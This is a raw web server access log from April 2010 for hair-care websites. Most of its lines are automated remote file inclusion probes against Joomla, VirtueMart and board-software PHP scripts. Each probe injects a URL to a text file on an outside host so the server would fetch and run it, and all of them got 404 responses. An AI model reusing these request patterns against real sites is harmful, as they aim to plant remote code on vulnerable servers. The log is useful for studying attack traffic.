186.28.232.13 - - [19/Apr/2010:04:52:57 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_extcalendar&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
186.28.232.13 - - [19/Apr/2010:04:53:54 -0700] "GET /logs/access_100412.log//index.php?_REQUEST=&_REQUEST[option]=option,com_extcalendar&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
186.28.232.13 - - [19/Apr/2010:04:56:21 -0700] "GET /logs/access_100412.log%20//index.php?_REQUEST=&_REQUEST[option]=option,com_extcalendar&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
222.236.47.182 - - [19/Apr/2010:04:59:49 -0700] "GET /logs/access_091123.log%20%20//include/write.php?dir=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [19/Apr/2010:04:59:49 -0700] "GET /logs//include/write.php?dir=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [19/Apr/2010:04:59:49 -0700] "GET /include/write.php?dir=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [19/Apr/2010:05:02:17 -0700] "GET /logs//include/write.php?dir=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [19/Apr/2010:05:02:17 -0700] "GET /logs/access_091123.log%20%20//include/write.php?dir=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [19/Apr/2010:05:02:17 -0700] "GET /include/write.php?dir=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.55.232.50 - - [19/Apr/2010:05:03:00 -0700] "GET /logs/access.log/http://moncrot.justfree.com/idourcrew.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
211.55.232.50 - - [19/Apr/2010:05:03:01 -0700] "GET /http://moncrot.justfree.com/idourcrew.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
211.55.232.50 - - [19/Apr/2010:05:03:01 -0700] "GET /logs/http://moncrot.justfree.com/idourcrew.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
66.113.99.66 - - [19/Apr/2010:05:07:13 -0700] "GET /write_update.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.72.194.58 - - [19/Apr/2010:05:07:34 -0700] "GET /write_update.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.72.194.58 - - [19/Apr/2010:05:07:34 -0700] "GET /logs/write_update.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.72.194.58 - - [19/Apr/2010:05:07:34 -0700] "GET /logs/access_100412.log%20%20/write_update.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.19.4.18 - - [19/Apr/2010:05:12:01 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
66.113.99.66 - - [19/Apr/2010:05:13:14 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.113.99.66 - - [19/Apr/2010:05:13:14 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.113.99.66 - - [19/Apr/2010:05:13:14 -0700] "GET /logs/access_100118.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.113.99.66 - - [19/Apr/2010:05:13:49 -0700] "GET /logs/access_100412.log%20%20/write_update.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.113.99.66 - - [19/Apr/2010:05:13:49 -0700] "GET /logs/write_update.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.138.88.246 - - [19/Apr/2010:05:18:46 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.138.88.246 - - [19/Apr/2010:05:18:46 -0700] "GET /logs/access_100118.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.138.88.246 - - [19/Apr/2010:05:18:46 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
221.212.177.254 - - [19/Apr/2010:05:20:18 -0700] "GET /logs/access_100322.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
110.45.147.246 - - [19/Apr/2010:05:22:06 -0700] "GET /logs/access.log%20%20/errors.php?error=http://sportsulsan.co.kr/poll/aipi/id.txt?%20? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [19/Apr/2010:05:22:06 -0700] "GET /errors.php?error=http://sportsulsan.co.kr/poll/aipi/id.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [19/Apr/2010:05:22:06 -0700] "GET /logs/errors.php?error=http://sportsulsan.co.kr/poll/aipi/id.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [19/Apr/2010:05:22:11 -0700] "GET /logs/access.log%20%20/errors.php?error=http://sportsulsan.co.kr/poll/aipi/id.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [19/Apr/2010:05:22:12 -0700] "GET /errors.php?error=http://sportsulsan.co.kr/poll/aipi/id.txt?%20? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [19/Apr/2010:05:22:12 -0700] "GET /logs/errors.php?error=http://sportsulsan.co.kr/poll/aipi/id.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
95.108.150.235 - - [19/Apr/2010:05:22:25 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.150.235 - - [19/Apr/2010:05:22:26 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
95.108.150.235 - - [19/Apr/2010:05:22:27 -0700] "GET / HTTP/1.0" 200 910 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.150.235 - - [19/Apr/2010:05:22:28 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
95.108.150.235 - - [19/Apr/2010:05:22:29 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.150.235 - - [19/Apr/2010:05:22:30 -0700] "GET / HTTP/1.0" 200 910 "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
110.45.147.246 - - [19/Apr/2010:05:22:59 -0700] "GET /logs/access_100412.log%20%20/errors.php?error=http://sportsulsan.co.kr/poll/aipi/id.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [19/Apr/2010:05:22:59 -0700] "GET /logs/access_100412.log%20%20/errors.php?error=http://sportsulsan.co.kr/poll/aipi/id.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:24:08 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:24:08 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:24:13 -0700] "GET /logs/access_091207.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:05:24:37 -0700] "GET /write_update.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:05:24:37 -0700] "GET /logs/access_100412.log%20%20/write_update.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:05:24:37 -0700] "GET /logs/write_update.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.174.185.131 - - [19/Apr/2010:05:24:37 -0700] "GET /logs/access_100308.log%20%20//write_update.php?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.174.185.131 - - [19/Apr/2010:05:24:37 -0700] "GET /write_update.php?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.174.185.131 - - [19/Apr/2010:05:24:37 -0700] "GET /logs//write_update.php?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:24:37 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:24:37 -0700] "GET /logs/access_091228.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:24:37 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:05:24:59 -0700] "GET /write_update.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:05:24:59 -0700] "GET /logs/write_update.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:05:24:59 -0700] "GET /logs/access_100412.log%20%20/write_update.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.72.194.58 - - [19/Apr/2010:05:27:04 -0700] "GET /logs/write_update.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.72.194.58 - - [19/Apr/2010:05:27:04 -0700] "GET /logs/access.log/write_update.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.72.194.58 - - [19/Apr/2010:05:27:04 -0700] "GET /write_update.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.72.194.58 - - [19/Apr/2010:05:27:20 -0700] "GET /logs/access_100308.log/write_update.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
194.63.141.198 - - [19/Apr/2010:05:32:03 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]" "www.freehairsecrets.com"
194.63.141.198 - - [19/Apr/2010:05:32:04 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]" "www.freehairsecrets.com"
66.113.99.66 - - [19/Apr/2010:05:32:20 -0700] "GET /logs/access_100118.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:32:29 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:32:31 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:32:32 -0700] "GET /logs/access_091207.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.72.194.58 - - [19/Apr/2010:05:33:20 -0700] "GET /logs/access_100412.log/write_update.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:34:26 -0700] "GET /logs/access_091228.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:34:26 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:34:27 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.46.157.102 - - [19/Apr/2010:05:35:05 -0700] "GET /logs/access_100111.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.pmsaluminium.com/levha/anket/.safe?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "growlonghairfast.com"
72.46.157.102 - - [19/Apr/2010:05:35:06 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.pmsaluminium.com/levha/anket/.safe?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "growlonghairfast.com"
72.46.157.102 - - [19/Apr/2010:05:35:06 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.pmsaluminium.com/levha/anket/.safe?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "growlonghairfast.com"
83.243.57.5 - - [19/Apr/2010:05:35:29 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
83.243.57.5 - - [19/Apr/2010:05:35:29 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
83.243.57.5 - - [19/Apr/2010:05:35:37 -0700] "GET /logs/access_100308.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:05:36:58 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:05:36:58 -0700] "GET /logs/access_100118.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:05:36:58 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:37:00 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:37:01 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:37:02 -0700] "GET /logs/access_091207.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:37:22 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:37:34 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:37:39 -0700] "GET /logs/access_091207.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:37:55 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:38:01 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:38:02 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:38:02 -0700] "GET /logs/access_091207.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:38:03 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:38:03 -0700] "GET /logs/access_091207.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:39:24 -0700] "GET /logs/access_100315.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:39:43 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:39:43 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:39:43 -0700] "GET /logs/access_091228.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:40:56 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:40:56 -0700] "GET /logs/access_091228.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:40:56 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:42:34 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:42:35 -0700] "GET /logs/access_091228.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:42:37 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:45:34 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:45:35 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:45:35 -0700] "GET /logs/access_091228.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [19/Apr/2010:05:46:40 -0700] "GET /freehairsecretsphp/ HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
78.138.88.246 - - [19/Apr/2010:05:48:21 -0700] "GET /logs/access_100118.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:49:08 -0700] "GET /logs/access_100315.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.129.119.41 - - [19/Apr/2010:05:49:47 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15364 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
61.67.201.187 - - [19/Apr/2010:05:52:00 -0700] "GET /logs/access_100315.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:05:52:06 -0700] "GET /logs/access_100412.log/write_update.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:52:08 -0700] "GET /logs/access_100315.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:52:25 -0700] "GET /logs/access_100315.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:05:52:29 -0700] "GET /logs/access_100315.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:05:55:38 -0700] "GET /logs/access_100412.log/write_update.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
83.243.57.5 - - [19/Apr/2010:05:59:46 -0700] "GET /logs/access_100118.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.129.119.12 - - [19/Apr/2010:06:01:22 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
216.129.119.41 - - [19/Apr/2010:06:09:34 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
